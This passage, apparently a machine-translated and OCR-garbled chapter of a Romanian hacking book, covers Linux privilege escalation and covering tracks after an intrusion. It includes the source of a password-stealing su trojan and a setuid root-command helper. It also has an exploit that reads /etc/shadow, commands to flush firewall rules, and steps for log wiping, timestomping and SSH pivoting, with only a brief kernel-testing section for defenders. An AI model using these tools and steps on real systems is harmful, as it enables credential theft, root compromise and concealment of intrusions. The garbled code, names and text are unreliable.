încât hackerii începători care nu au cunoștințe suficiente despre limbaje de programare să nu le poată folosi Elevație de privilegii Orez D Escalarea privilegiilor locale cu exploit vmsplice de la qaaz Printre toate exploit-urile de pe acest site, îl găsim pe cel potrivit - acesta este Linux kemel - vmsplice Local Root Exploit (se află la www exploit-db com/exploits/ /) Exploatarea a fost scrisă în de un anume hacker pe nume qaaz Numele complicat de fișier jessica biel naked in my bed (Jessica Biel goală în patul meu) nu are prea multă semnificație semantică, așa că îl puteți înlocui cu unul mai scurt Extensia de fișier c arată clar că exploit-ul este scris în C În această etapă, puteți fie să transferați textul exploit-ului în editorul Kate și să îl salvați în directorul /tmp sub numele ex c, fie, ca și în viața reală, descărcați exploit-ul direct de pe site cu următoarea comandă de consolă: wget - /tmp/ex c http://www exploit-db com/download/ Citim cu atenție explicațiile pentru exploatare De obicei, ele specifică opțiuni de compilare și exemple de utilizare Adesea, exploatările nucleului necesită compilare cu opțiunea -static, uneori se adaugă și alte opțiuni Pe Linux, compilatorul C standard este gcc (GNU C Compiler) Ocazional este folosit un alt compilator - cc (C Compiler) În cazul nostru, să compilam exploit-ul cu opțiunile specificate: gcc -static -W -n -o ex ex c Aici, după opțiunea -o, este indicat numele fișierului de ieșire (avem - ex) Numele fișierului de intrare (ex c) este indicat la sfârșit După cum puteți vedea (vezi Figura D ), compilarea a avut succes, nu au apărut avertismente (avertisment) și mesaje de eroare (ergor) După rularea exploit-ului nostru (folosind comanda /ex), devine clar că a funcționat cu succes: semnul $ din promptul de sistem este înlocuit cu semnul #, care este tipic pentru superutilizator Comanda id confirmă că rulăm acum ca utilizator root (uid=O) Adică, am atins obiectivul principal al tuturor hackerilor - obținerea de privilegii maxime în sistem Felicitări! D Elevație de privilegii Iată o listă de nume de exploit potrivite pentru diferite versiuni ale nucleului Linux - newlocal, kmod, uselib ; - brk, brk , newlocal, kmod; - brk, brk , newlocal, kmod; - ptrace, kmod, ptrace-kmod, brk, brk ; - brk, brk , ptrace, ptrace-kmod; - brk, brk , ptrace, ptrace-kmod; - - loginx; - mremap pte; - mremap pte, uselib ; - - uselib ; -uselib ; - mremap pte, krad, hOOlyshit; - - krad, krad , hOOlyshit; , , - , krad , hOOlyshit; - krad, krad , hOOlyshit; - - rădăcină, hOOlyshit; - krad, krad , hOOlyshit; - - raptor, raptor , hollyshit, prctl; - - vmsplice; - ( de biți) - ip append data() x -CVE- - ; - +/SELinux/RHEL Test Kernel Local Root Exploit Oday; - perfcounter (x ); - -rc - Conducta c Când un hacker are doar un shell web și nu are nicio modalitate de a utiliza o conexiune în spate (deoarece conexiunile de ieșire sunt, de asemenea, filtrate de firewall), atunci folosind un exploit local, puteți obține acces la rădăcină prin shell-ul web și apoi dezactivați firewall-ul După aceea, vă puteți conecta la server direct prin SSH sau utilizați un shell de backconnect Acum ne vom da seama cum să o facem Înainte de a încărca exploit-ul pe server, trebuie să găsiți în codul său linia care execută comanda /Ы n/sh și să înlocuiți această comandă pentru a lansa shell-ul cu sistemul de linii ("chmod /tmp/hack"); În acest caz, după obținerea accesului root prin exploit, comanda chmod va seta bitul sul d (acest lucru se face cu prima cifră - ) pentru programul /tmp/hack și departe Elevație de privilegii Cel mai nou va fi executat cu drepturi de superutilizator Apoi trebuie să creați un fișier hack c cu ceva de genul acesta: # ps ude # nclude intmalnO { FIȘIER *fișier: char *cmd: getuld(O): getgld(O); fișier - fopen(, tmp/cmd","r"); cmd - fgets(cmd file); fclose(flle): system(cmd); } Conform binecunoscutei tradiții hackerilor, vă prezint aici nu un cod de program complet funcțional, ci doar o schiță pentru a ilustra ideea Cine știe, va corecta greșelile Hackerii spun că corup în mod deliberat codul sursă, astfel încât noii veniți care nu înțeleg limbaje de programare să nu copieze soluții gata făcute Acest program preia o comandă din fișierul /tmp/cmd și o execută, iar din moment ce programul /tmp/hack are setat bitul sul d, comanda va rula ca root Apoi, hackerul își încarcă textul pe server în directorul /tmp și îl compilează pentru a crea un fișier binar /tmp/hack Ca rezultat, după compilarea și rularea cu succes a unui exploit modificat pe același server, acesta va avea un shell rădăcină cu drepturi depline care execută comanda specificată în /tmp/cmd De ce nu am inclus execuția comenzii din fișier în codul exploit-ului în sine? Pentru că multe exploit-uri sunt instabile, adică nu dau drepturi root de fiecare dată, iar unele chiar vă permit să obțineți aceste drepturi o singură dată (cum ar fi exploit-ul do brk) Când exploit-ul are succes, hackerul, pentru a afla regulile firewall-ului, scrie linia în /tmp/cmd Iptables -t nat -nvL Apoi, după ce s-a familiarizat cu regulile, le anulează cu comanda iptables -F După aceea, nimic nu-l împiedică să se conecteze direct la computer Apoi, el poate instala o versiune falsă a Iptables care ascunde regulile sale (care afișează regulile anterioare la cerere) sau pur și simplu să încarce un shell PHP în directorul web și să seteze suld bit-ul pe acesta, astfel încât shell-ul să ruleze ca root Se întâmplă adesea ca cel mai recent exploit - așa-numitul exploit zero-day (O-day) să fie cumpărat (sau tranzacționat) de un hacker într-o formă compilată, ceea ce înseamnă că nu va fi posibil să-și schimbe codul Dar chiar și în acest caz, hackerii au o abordare eficientă De obicei, un exploit invocă shell-ul /bin/sh accesând-o direct Să scriem un script pentru a rula exploit-ul: D Elevație de privilegii #! /ы n/sh alias „/bin/sh” „chmod /tmp/eviii” Urmează lansarea exploit-ului în sine Aceasta va rula comanda chmod în loc de /nn/sh ca root Ca „temă” puteți încerca să obțineți drepturi de root pe sistemul Bask Tgask (acolo este folosită versiunea mai nouă a nucleului - ) Și apoi comparați rezultatele dvs cu cele prezentate la sfârșitul capitolului Dar ce trebuie să facă un hacker dacă niciunul dintre exploit-urile disponibile nu oferă permisiuni root^ Să presupunem că hackerul are numele de utilizator și parola unui utilizator neprivilegiat Apoi, uitându-vă la fișierul bash history, puteți verifica dacă acest utilizator a rulat comanda su (switch user) când trece la superutilizator În acest caz, hackerul poate încerca să înlocuiască comanda si cu propriul său program troian, care va intercepta parola Pentru a face acest lucru, un director ascuns este creat în directorul principal al utilizatorului mkdlr elm Puteți folosi un director existent, cum ar fi ssh, trebuie doar să vă amintiți să schimbați numele atunci când aplicați exploit-ul Atacatorul trebuie apoi să editeze (sau să creeze) fișierul bashrc pentru a include următoarea linie PATH=$HOME/ elm:$PATH Această linie adaugă directorul ascuns elm la începutul căii de căutare executabile Acum, dacă utilizatorul introduce comanda su fără a specifica calea completă (ceea ce se întâmplă de obicei), comanda su va fi executată din directorul hackerului și nu din directorul /bin, așa cum era înainte Troianul su c, care a fost scris de hackerul FA-Q încă din , poate fi descărcat de la http://www packetstormsecurity org/trojans/index htmL Pentru orice eventualitate, voi cita textul complet: /* su trojan rlbbed - by FA-Q * werd la Iwn pentru ajutor *mkdlr elm * cc -o ~/ elm/su su c * edlt bash profile sau bashrc *add PATH=$HOME/ elm:$PATH */ # nclude # nclude #def ne SU-PASS „/tmp/ rewt” maln(Int argc, char *argv[]) { char*key: charbuf[ ]; FIȘIER *fd; cheie = (char *)getpass("Parola:"); fd = fopen(SU-PASS,"w"); fpr ntf(fd, "trece: Ks\n", cheie); Elevație de privilegii fclose(fd); printf("su: Parola incorecta\n"); sprintf(buf, "rm Ks", argv[ J): system(buf): exit( ); } Puteți compila acest program cu comanda ss -o ~/ elm/su su c Dacă numele directorului este diferit, înlocuiți-l Cum funcționează acest program? Acesta cere utilizatorului o parolă și o stochează în fișierul /tmp/ rewt, apoi afișează un mesaj că parola este incorectă, se șterge singură și iese În acest caz, utilizatorul crede de obicei că a apăsat din greșeală tasta greșită când a tastat parola și din nou execută comanda su Deoarece troianul sa șters deja, programul su normal este executat Iar hackerul poate afla parola doar uitându-se la fișierul /tmp/ rewt Cu toate acestea, după cum am aflat, acest program conține o eroare din cauza căreia fișierul programului nu este șters Cu toate acestea, eroarea poate fi corectată cu ușurință Iată linia cu eroarea: sprintf(buf, "rm Xs", argvCOJ); În schimb, trebuie să introduceți ceva ca această linie: spr ntf(buf "rm /home/user/ elm/^s" argv[ ]): Adică, trebuie să specificați calea completă către fișierul troian su în comanda rm Pe unele sisteme (cum ar fi DVL), mesajul „su: parola incorectă” trebuie înlocuit cu altul care este standard pentru acel sistem, de exemplu: „Ne pare rău” Totuși, la rularea acestui program în DVL, am avut unele probleme, în același timp, în sistemul BackTrack , programul funcționa bine (Fig D ) Am creat un utilizator uri și directorul său de pornire (home/uri) în avans După toate pregătirile necesare și rularea programului su, parola de root pe care am introdus-o a fost stocată într-un fișier ascuns în directorul /tmp Troianul s-a șters singur, dar când su a fost repornit, a apărut o problemă - interpretul bash a căutat fișierul su din anumite motive numai în directorul /home/uri/ elm și nu l-a găsit Pentru un hacker, desigur, acesta este un eșec, dar pentru scopurile noastre educaționale este destul de normal A trebuit să rulez su cu calea completă: /bin/su Apropo, lansarea constantă a unor programe precum su, adesea înlocuite de hackeri, cu calea completă (de exemplu, /bin/su) vă permite să nu vă fie frică de astfel de troieni Este o idee bună să folosiți periodic comanda echo $PATH pentru a verifica conținutul variabilei $PATH pentru noi directoare ciudate O altă situație interesantă este atunci când un hacker câștigă în mod regulat privilegii de root folosind un exploit, dar dorește să cunoască parola superutilizatorului Hash-ul este „de ruptură”, aparent, parola este lungă și complexă Dar el observă (din fișierul bash history) că destul de des un alt utilizator intră în sistem și execută regulat comanda su După ce a revizuit lista de căi către fișierele executabile, așa cum sa menționat deja, folosind comanda echo $PATH, hackerul observă că D Elevație de privilegii Orez D Folosind troianul su directorul /sbin/su precede directorul /bin/su din listă, ceea ce înseamnă că va fi căutat mai întâi Adică, dacă un hacker plasează troianul su în /sbin/su, el are toate șansele să obțină parola de superutilizator sub formă de text, indiferent din câte caractere constă (da, cel puțin !) și oricât de diversă sunt Rămâne doar să așteptați și să „verificați capcanele” în mod regulat Troianul su poate fi recunoscut de unii antivirus, așa că hackerul încearcă să schimbe programul în așa fel încât antivirusul să nu-l vadă Uneori mă întreb ce fel de prostii se găsesc pe site-urile dedicate software-ului anti-spyware De exemplu, pe pagina http://www spywaredb com/remove-su-trojan-ribbed/ am găsit următoarele informații (în engleză): Su trojan ribbed este unul dintre programele spion troiene Detectarea acestui program pe computer înseamnă că computerul este infectat cu un troian și că datele critice pot fi în pericol sau chiar pierdute Pentru a elimina automat Su troian ribbed, descărcați Spyware Doctor Pentru a elimina manual troianul Su, ștergeți fișierul su c txt M-a impresionat în special extensia txt © Dacă vă amintiți, nu am menționat fișierul su c txt nicăieri Și nu textul original al troianului trebuie șters (de obicei este șters de hacker însuși, pentru a nu trezi suspiciuni), ci fișierul executabil fals su Și dacă s-a șters deja, trebuie să căutați fișiere ascunse suspecte în directorul /tmp și să scrieți parola greșită acolo, în speranța că hackerul nu a avut încă timp să vadă aceste fișiere Și ceea ce este adevărat aici este doar că sistemul este cu adevărat compromis, adică hackerul știe deja parola a cel puțin unui Elevație de privilegii utilizator legitim Prin urmare, trebuie luate măsuri urgente pentru a schimba toate parolele, pentru a detecta și închide căile de intruziune și nu pentru a șterge doar un fișier Și nici un miraculos „Spyware Doctor” nu va ajuta, rezolvarea acestei probleme este o treabă pentru un anti-hacker Și singurul scop al unor astfel de mesaje înspăimântătoare de pe site-urile web ale producătorilor de software este de a „vând” produsul lor consumatorilor creduli Și cum să vezi conținutul fișierului /etc/shadow sau al unui alt fișier fără a avea drepturi de root? Există o cale foarte veche Probabil că nu va funcționa pe mașinile de astăzi, dar îl includ aici doar pentru informații, astfel încât să vă puteți minuna de ingeniozitatea hackerilor Versiunea IBc utilizată în sistem trebuie să fie marcată Unul dintre următoarele fișiere trebuie să existe și cu setul de biți suld: plng, traceroute, rlogin sau ssh Tastați bash la promptul de comandă pentru a porni shell-ul bash Introduceți următoarea comandă: exportați RESOLV HOST CONF=/etc/shadow Introduceți unul dintre numele de fișiere enumerate urmat de câteva litere, cum ar fi „asdf”: plng asdf Dacă acest truc funcționează, conținutul fișierului /etc/shadow va fi afișat Îl puteți înlocui cu orice alt fișier, ale cărui drepturi aparțin utilizatorului root Acest truc nu a funcționat pentru mine în DVL - am nevoie de o distribuție Linux veche Esența metodei nu este explicată pe internet, dar pentru puține cunoștințe de administrare și engleză, pare destul de evident Comanda plng și restul programelor enumerate aici (traceroute, rlogin, ssh) funcționează cu gazde pe Internet, iar variabila de mediu RESOLV HOST CONF, aparent responsabilă pentru rezolvarea numelui gazdei, este introdusă nu numele fișierului de configurare, ci numele /etc/shadow Ca rezultat, dacă o comandă este executată pentru o gazdă inexistentă (asdf), programul afișează conținutul fișierului specificat în variabila RESOLV HOST CONF Iată un mic program de hackeri rcb c care exploatează această vulnerabilitate: /* RCB Phraser - terapie În ' * Llmits: numai Linux nicio fi Ie blnary * Puțin mesaj personal către lume: F*CK CENSORSHIP! */ # nclude vold getjunk(const char *filetocat) { setenv("RESOLV-HOST-CONF" filetocat, ): systemCpIng xy > /dev/null > phraslng"); unsetenv("RESOLV HOST CONF"): } continuarea & D Elevație de privilegii void maln(argc argv) int unde; char **arv; {charbuffer[ ]; char*gag; FIȘIER *dezvoltare; f((argc==l) || !(strcmp(argv[l],"-h")) || !(strcmp(argv[l]," help"))) { printfCRCB Phraser - junked by THERAPY\n\n"); printfC'Usage: Ss [NO OPTIONS] [FILE to cat]\n\n",argv[ ]): exit(l); } getjunk(argv[l]); gag=tampon; gag+= ; devel=fopen("frazare" "rb"); while(!feof(devei)) { fgets(buffer,sizeof(buffer) devei); if(strlen(buffer)> ) { strcpy(buffer+strlen(buffer)- ,"\n"); fputs(gag stdout); } } fclose(dezvoltare): removeCphrasing"); } Pe linia de comandă, introduceți comanda reb /etc/shadow În loc de /etc/shadow, puteți introduce numele unui alt fișier pe sistem pe care nu îl puteți citi Pentru sistemele Linux cu o versiune de kernel sub -gs (care este deja destul de veche, dar poate fi găsită pe undeva pe Internet), există un exploat de exploatare de modificare a proprietății de grup Linux Kernel x chown() care modifică Proprietatea de grup a oricărui fișier, cum ar fi /etc/passwd, astfel încât să poată fi vizualizat de un utilizator neprivilegiat Exploit-ul a apărut în de către Marco Ivaldi și poate fi găsit la http://www exploit-db com/exploits/ / Ce ar trebui să facă un hacker dacă tot nu poate obține acces root pe sistem? Nu abandonează complet sistemul, ci își amintește informații despre acesta (dar în niciun caz nu face notițe pe hârtie!), pentru ca ulterior, când apar noi exploit-uri, să poată încerca din nou Hackerul încearcă să nu fie prea „strălucitor” în acest sistem, deoarece fiecare vizită la el lasă o intrare în jurnalele de sistem Și când un utilizator legitim se conectează, el va vedea mesajul: ultima înregistrare de la xxx com tlme: : date:xx/xx/xx, Acest mesaj oferă adresa IP sau numele site-ului de la care hackerul sa conectat ultima dată în sistem Pentru a liniști puțin utilizatorul, hackerul poate, după Cum să vă protejați de exploit-urile la nivel de kernel login executați comanda ssh localhost și conectați-vă din nou de la localhost Apoi, data viitoare când utilizatorul se conectează, va vedea următorul mesaj, care aproape că nu trezește suspiciuni: ultima conectare de la localhost Aceasta este cea mai simplă tehnică de ascundere a urmelor unei intruziuni, altele mai complexe vor fi discutate în capitolul următor Cum să vă protejați de exploit-urile la nivel de kernel Urmând administratori de sistem cu experiență, vă pot sfătui doar un singur lucru: testați-vă în mod regulat sistemul pentru vulnerabilități cu cele mai recente exploit-uri publice Este mult mai bine dacă nu este testat sistemul de lucru în sine, ci copia sa exactă (pe un computer real sau sub o mașină virtuală) Acest lucru va preveni pierderea datelor sau oprirea sistemului în cazul unei funcționări anormale a exploit-ului Și dacă se găsește o vulnerabilitate, aplicați imediat patch-uri, actualizați versiunea de kernel Acum vă voi arăta un exemplu de astfel de testare îmbunătățită folosind Vasque Tgask ca exemplu Porniți o mașină virtuală cu această distribuție Nu uitați să activați serviciile de rețea cu comanda consolei: /etc/init d/networking start Apoi, comutați comanda su la orice utilizator fără privilegii, de exemplu, astfel: nu pe nimeni Schimbați în directorul /tmp și descărcați cel mai recent kit de exploatare de pe www grsecurity net (Figura D ): wget www grsecurity net/~spender/enl ghtenment tgz Acest set de programe este conceput special pentru pentesting (pentesting, de la penetration testing - penetration testing) Pentru ca administratorul de sistem, care este de obicei o persoană foarte ocupată, să nu piardă timpul căutând și compilând exploit-uri individuale, totul este colectat aici „într-o sticlă”, compilat automat, lansat prin meniu Dezarhivați arhiva: tar -xzvf enllghtenment tgz Apoi schimbați în directorul corespunzător și rulați fișierul batch: cd en * /run null exploits sh Pentru a nu introduce un nume de director lung, am folosit aici globbing (glob-bing) - am indicat doar primele caractere din numele directorului și am pus un asterisc în locul celorlalte Dacă globbingul este activat pe sistem și începutul numelui directorului este unic, comanda cd va sări imediat în directorul dorit D Elevație de privilegii Orez D Descărcarea, despachetarea și rularea pachetului exploit Meniul care apare după rularea fișierului batch include exploit-uri care funcționează cu nuclee până la versiunea (Fig D ) Orez D Exploatați meniul de selecție Cum să vă protejați de exploit-urile la nivel de kernel Testați-vă sistemul secvenţial pentru rezistenţa la diferite exploatari Versiunea mea de kernel „a predat” exploitului MooseCox numărul (Fig D ) Orez D Utilizarea cu succes a exploit-ului MooseCox Procesul de astfel de testare este fascinant în sine, iar cuvintele alese aleatoriu ale clasicilor lumii (Sartre și Dostoievski, Nietzsche și Schopenhauer) care apar pe ecran de fiecare dată când exploit-ul este lansat oferă un plus de gândire Notați rezultatul testării pentru fiecare dintre exploit-uri pe o bucată de hârtie sau în Notepad După ce le-ați încercat pe toate cele șapte, mai rulați câteva exploit-uri în plus: /runjionnull exploits sh După cum probabil ați ghicit din numele fișierului, aceste exploit-uri nu funcționează cu memoria pagina zero, spre deosebire de cele folosite puțin mai devreme La finalizarea testării, marcați din nou acele exploit-uri pentru care sistemul s-a dovedit a fi instabil Ce ne spune rezultatul testării noastre? Faptul că administratorul trebuie să actualizeze nucleul la unul mai nou, de exemplu, la , deoarece, din fericire, nu se află încă pe lista exploit-urilor Dar nu trebuie să fii păcălit de „magia numerelor” - uneori, un exploit conceput pentru o anumită versiune a nucleului poate funcționa cu succes pe alt sistem Mențiuni despre acest lucru se găsesc pe site-urile hackerilor Și despre nocivitatea ipotezelor neverificate, britanicii au chiar și o vorbă atât de modernă: „„Presumați” D Elevație de privilegii face un fund din tine și din aceia” Nu voi traduce, lasă experții englezi să aprecieze jocul de cuvinte Deci totul trebuie testat cu propriile mâini și, după actualizarea versiunii de kernel, testați-o din nou pentru supraviețuire, acordând o atenție deosebită acelor exploit-uri care au funcționat cu succes prima dată În mod similar, puteți testa distribuția Damn Vulnerable Linux și va exista o exploatare funcțională pentru aceasta în colecție (diferită de cea pe care am folosit-o la începutul capitolului) E Ascunderea urmelor de prezență Una dintre cele mai necesare utilități de pe o mașină capturată este un dispozitiv de curățare a fișierelor jurnal, numit și ștergător de jurnal În timp ce un hacker intră într-un site web, el lasă o mulțime de urme în jurnalele (jurnalele) ale serverului web De asemenea, conectându-se ca utilizator specific, el lasă în mod constant urme în jurnalele de sistem Pentru a ascunde urmele prezenței lor, ar fi bine ca un hacker să curețe aceste fișiere Desigur, puteți utiliza serviciile unui logwiper numai dacă hackerul are drepturi de superutilizator (rădăcină), deoarece accesul de scriere la jurnalele de sistem este închis pentru toți ceilalți utilizatori Pentru a vedea urmele hack-ului în jurnalele serverului Apache, deschideți fișierul /usr/local/apache/logs/access log într-un editor Veți vedea o mulțime de lucruri interesante (Fig E ) - - [ /Iun/ : : : - ] „GET /ay php?page= / / / / / /etc/pBSSwA HTTP/ " ѲѲ - - [ /Iun/ : : : - ] „GET /au php'page" / / / / / /etc/shadow HTTP/ " - - [ /Iun/ : : : - ] „GET /au php'page" / / / / / /etc/passwcftOO HTTP/ " - - [ /Jun/ : : : - ] „GET /au php?page” / / / / / /etc/passwd HTTP/ " - - [ /Iun/ O O: O: : B - ] „GET /au php?page= / / / / / /etc/passwd HTTP/ " - - [ /Jun/ O : : : - ] „GET /cad php?cad=ls php HTTP/ ” - - [ /Iun/ : : : - ] „GET /inj php?page"http://localhost/cid php?cid"ls HTTP/ " Ѳ - - [ /Iun/ : : : - Ѳ ] „GET /cad php'cad=ls HTTP/ ” - - [ /Iun/ : : : -Ѳ ] „GET /inj php?page-http://localhost/cad php?cad-ls O HTTP/ " - - [ /Iun/ : : : - ] „GET /cad php?cad=ls HTTP/ ” - - [ /Iun/ : : : - ] „GET /inj php*pagina"http://localhost/cad php?cad"ls HTTP/ " - - [ /Iun/ : : : - ] „GET /cad php?cad=ls HTTP/ ” - - [ /Iun/ : : : - ] „GET /inj php?page"http://localhost/cad php?cad"ls HTTP/ " Orez ѲЕ Urme ale activității hackerilor în jurnalul accessjog Multe site-uri de hacking recomandă folosirea jurnalului Vanish , scris de un hacker numit Neo The Hacker Puteți descărca arhiva codului sursă de aici: http://packetstormsecurity org/UNIX/penetration/log-wipers/vanish tgz E Ascunderea urmelor de prezență Acest program curăță fișierele WTMP, UTMP, lastlog, mesaje, securizate, xferlog, maillog, warn, mail, httpd accessjog, httpd errorjog Accentul ar trebui să fie pe ștergerea jurnalelor de mesaje, securizate și httpd accessj og Vanish se descurcă bine cu această sarcină De asemenea, puterea agentului de curățare este absența fișierelor temporare după muncă Acestea sunt create pe durata epurării, dar sunt șterse la finalizarea acesteia Să mergem la directorul /tmp și să descarcăm fișierul cu arhiva: wget - vanish tgz http://packetstormsecurity org/UNIX/ penetrați op/ og-wi pers/vani sh tgz Apoi trebuie să dezarhivați fișierul descărcat: tar -xzvf vanish tgz Programul ar trebui să fie compilat astfel: gcc vanish c -o vanish Pe sistemul meu (Damn Vulnerable Linux), compilatorul a dat o eroare care afirmă că funcția de ieșire nu are suficiente argumente A trebuit să înlocuiesc toate apelurile funcțiilor exit() cu apeluri exit(O) în editor După compilare, am rulat programul (Fig E ): vanish nimeni localhost ges® Shell - Konsole T s □ 'gcc vanish c -o vanish vanish Vanish II de Neo the Hacker Utilizare: vanish Dispărea? nimeni localhost La dracu' Wtmppereission negat Pleacă de aici utmpta rget procesat ] ▼ Orez ѲE Compilarea și rularea programului Vanish Jurnalul utmp a fost șters, dar jurnalul wtmp nu a fost găsit Din păcate, dacă span-ish nu găsește niciun jurnal, acest program se blochează și nu curăță jurnalele rămase Înainte de a compila și de a rula vap-ish , găsiți toate fișierele jurnal de pe sistemul dvs și scrieți căile corecte către ele în textul sursă În plus, puteți încerca să editați codul sursă în așa fel încât programul să continue să funcționeze în orice caz Pentru a face acest lucru, înainte de fiecare ieșire de ieșire de urgență ( ), când următorul fișier jurnal nu este găsit, trebuie să puneți simboluri de comentariu, astfel: // ieșire (O): A trebuit să schimb calea către jurnalele accessjog și error Log După aceea, programul a funcționat așa cum se arată în Fig E jurnal accessjog de ex Ascunderea urmelor de prezență a fost complet șters, deoarece site-ul nostru a fost accesat doar de la adresa În viața reală, numai intrările cu adresa IP a hackerului sunt eliminate din acesta, în timp ce multe alte intrări rămân Astfel, administratorul nu va putea afla de către cine, când și cum exact i-a fost spart serverul Orez E Rezultatul programului Vanish modificat Poate singurul dezavantaj al lui Vanish este viteza sa Potrivit site-ului web hacker-pro, în timpul testării acestui program, o curățare completă de două săptămâni a jurnalelor de server a durat aproximativ minute Puteți găsi alte ștergătoare de jurnal la http://packetstorm-security org/UNIX/penetration/log-wipers/ Dar ce se întâmplă dacă hackerul nu reușește să obțină privilegii de root pe sistem, la care se conectează uneori ca utilizator legitim? Administratorul de sistem poate vizualiza cu ușurință ultimele autentificări ale utilizatorilor cu comanda ast Pentru a nu lăsa urme incriminatoare în jurnalele utmp și wtmp, hackerii recomandă utilizarea programului ssh cu parametrul -T pentru a intra în sistem (dacă utilizatorii au voie să intre în sistem fără alocarea unui pseudo-terminal) În acest caz, pseudo-terminalul nu este creat și, în consecință, nu este creată nicio intrare în aceste jurnale Programul PuTTY sub Windows are și o opțiune similară, setată în fila SSH ► TTY (Nu allocați, ci pseudo-terminal) Dar puțini oameni știu despre asta Dacă un hacker editează unele fișiere în sistem, își amintește ora creării lor și apoi, după modificarea fișierelor, folosește comanda tactilă cu opțiunea -t pentru a returna ora anterioară creării lor Formatul comenzii este următorul: atingeți -t YYYYMMDDHHMME ss] nume de fișier (sau director) Aici YYYY este anul, MM este luna, DD este ziua, HH este ora și MM este minutul Un parametru opțional este specificat între paranteze drepte - secunde De asemenea, dacă hackerul a creat fișiere și directoare noi, puteți modifica ora creării lor la o oră anterioară pentru a nu trezi suspiciuni De exemplu, pentru a modifica ora de creare a fișierului E Ascunderea urmelor de prezență file c pe iunie ore minute și secunde, trebuie să introduceți următoarea comandă: atingeți -t fișier c Din păcate pentru hacker, această comandă nu este întotdeauna permisă pentru utilizatorii normali Cercetarea sistemului Datorită studiului sistemului, un hacker reușește să pătrundă în computerul altcuiva, să capete un loc în el, să-și mărească privilegiile și să pătrundă în alte sisteme Un hacker trebuie să exploreze sistemul în toate etapele, dar cercetarea este deosebit de eficientă după obținerea drepturilor de root, pentru că atunci are acces la toate fișierele și toate comenzile Având acces la shell-ul sistemului, un hacker poate face, de exemplu, următoarele Vedeți cine este conectat în prezent (cu comanda w sau who) și cine s-a conectat recent (cu comanda ast) Pentru a afla când s-a conectat un anumit utilizator, utilizați comanda st username De asemenea, puteți obține informații despre utilizatorul de interes (cu comanda finger) Dacă atacatorul nu are încă conținutul fișierelor /etc/passwd și /etc/shadow, le poate obține Dacă fișierele sunt mari, le puteți copia într-un director accesibil FTP și apoi le puteți prelua de acolo Și dacă utilizați PuTTY, puteți activa înregistrarea selectând Session ► Logging (Printable Output) din meniu Apoi toate ieșirile din consolă vor fi trimise în fișierul jurnal putty log (sau altul specificat de hacker) Apoi puteți afișa conținutul fișierelor cu comanda cat și apoi puteți vizualiza conținutul în fișierul jurnal Răsfoirea prin fișierele disponibile poate oferi unui hacker idei noi Uneori pot exista copii care pot fi citite public ale fișierelor vechi /etc/shadow (numite ca /etc/shadow old sau doar shadow, dar într-un director diferit) Dacă sistemul dumneavoastră utilizează LDAP pentru a autentifica utilizatorii, puteți căuta în directorul /usr/local/openldap/backup o copie text simplu a bazei de date LDAP Această bază de date, printre alte informații despre utilizatori, conține hash-uri de parole codificate suplimentar folosind algoritmul base Un script Perl simplu, descris în capitolul OS, va extrage și decoda hash-urile parolei, după care pot fi sparte folosind John The Ripper Istoricul comenzilor introduse de utilizator poate fi studiat de un hacker folosind fișierul bash his-tory El este interesat în special de acest fișier din directorul superutilizator (rădăcină) În plus, un hacker poate examina fișiere script ( sh, etc ) F Cercetarea sistemului În timpul studiului sistemului, hackerul examinează acțiunile superutilizatorului, vede ce măsuri ia pentru a detecta intruziunea hackerilor Pentru a face acest lucru, caută în directorul principal al rădăcinilor fișiere și directoare numite hack, hack-ing, hacker, intruder etc De exemplu, un nume de script precum check intruder sh îi spune atacatorului că acest script verifică sistemul pentru posibile intruziuni Desigur, hackerul examinează cu atenție acest script pentru a nu fi prins și, dacă este necesar, îl editează ușor pentru a nu detecta intruziunea Hackerul va căuta întotdeauna în fișierele /etc/hosts și ssh/known hosts pentru a vedea la ce gazde pot fi conectate de pe computer Parola pentru utilizatorul root poate fi aceeași pentru mai multe site-uri dintr-un domeniu Și dacă parola utilizatorului root nu este cunoscută, dar hackerul a obținut acces root folosind un exploit, el poate folosi pur și simplu comanda ssh pentru a se conecta la gazdele aferente: ssh root@other-host net În același timp, pe cealaltă gazdă, trebuie permisă autentificarea superutilizatorului de pe prima mașină fără parolă Dar mai des există o situație ușor diferită - autentificarea folosind fișierele cheie este permisă Exemplu: ssh - keylocation root@other-host net Algoritmi pentru obținerea controlului asupra serverului Aici ne vom uita la câțiva algoritmi pentru pătrunderea hackerilor în server, pe baza materialului din capitolele precedente Pentru simplitate, am împărțit toate situațiile posibile în grupuri mari (Fig ) Voi face câteva explicații schemei Injecția SQL se referă atât la injecții obișnuite, cât și la oarbe Utilizarea XSS este lăsată în afara schemei În ciuda faptului că schema arată deformarea site-ului (sau deformarea în masă a site-urilor) ca unul dintre obiective, hackerul de obicei nu se străduiește pentru acest scop, deoarece poate fi „calculat” și bloca accesul la sistem Un hacker efectuează o defacere numai dacă sistemul dat nu îl interesează (este nepotrivit) pentru alte aplicații Un exemplu teoretic al cazului de nepotrivire aproape completă a sistemului: doar accesul prin protocolul FTP este deschis, dar din motive de securitate, toate funcțiile responsabile cu executarea comenzilor sistemului (systemO, passthruO și shell execO) sunt dezactivate în PHP și scripturile perl și python nu sunt executate Astfel, hackerul nu poate executa shell-ul web încărcat în sistem, iar pătrunderea ulterioară prin Web este imposibilă Cu toate acestea, sistemul poate fi folosit în continuare ca intermediar pentru stocarea fișierelor, care vor fi apoi descărcate în alte sisteme vulnerabile Observ că cea mai „prietenoasă cu mediul” este să vă conectați ca utilizator legitim fără a crea un pseudo-terminal (unde este posibil) Indiferent dacă un hacker a obținut sau nu acces root, el poate păstra accesul la un anumit computer timp de ani de zile Schema descrisă, desigur, nu poate acoperi toată bogăția situațiilor reale, dar vă oferă o idee despre cum un hacker poate intra în sistem și obține un punct de sprijin în el Un hacker adevărat caută întotdeauna nu numai să obțină acces la sistem, ci și să îl păstreze cât mai mult timp posibil Algoritmi pentru preluarea controlului asupra serverului Orez Schemă de obținere a accesului neautorizat la server prin intermediul Web-ului Exploatările de la distanță Există o întreagă clasă de exploit-uri de la distanță care exploatează vulnerabilitățile din diferite servicii Acestea vă permit să executați comenzi pe un sistem de la distanță sau să provocați o refuz de serviciu pe acesta Caracteristica lor distinctivă este „personalizarea” lor pentru un anumit nume și versiune a demonului (serviciului) Adică, hackerul trebuie să se asigure că versiunea corectă a serviciului este instalată pe sistemul investigat Deși un studiu detaliat al unor astfel de exploatări depășește scopul acestei cărți, care este dedicată în principal hacking-ului web (adică pirateriei prin intermediul site-urilor web), ne vom uita pe scurt la exploatările de la distanță folosind un exemplu simplu - vulnerabilitățile serverului IP ProFTPD Vulnerabile sunt versiunile de la la gs , iar vulnerabilitatea în sine constă în posibilitatea injectării SQL Când un utilizator (de obicei un program client) se conectează la serverul Jp (prin portul ), 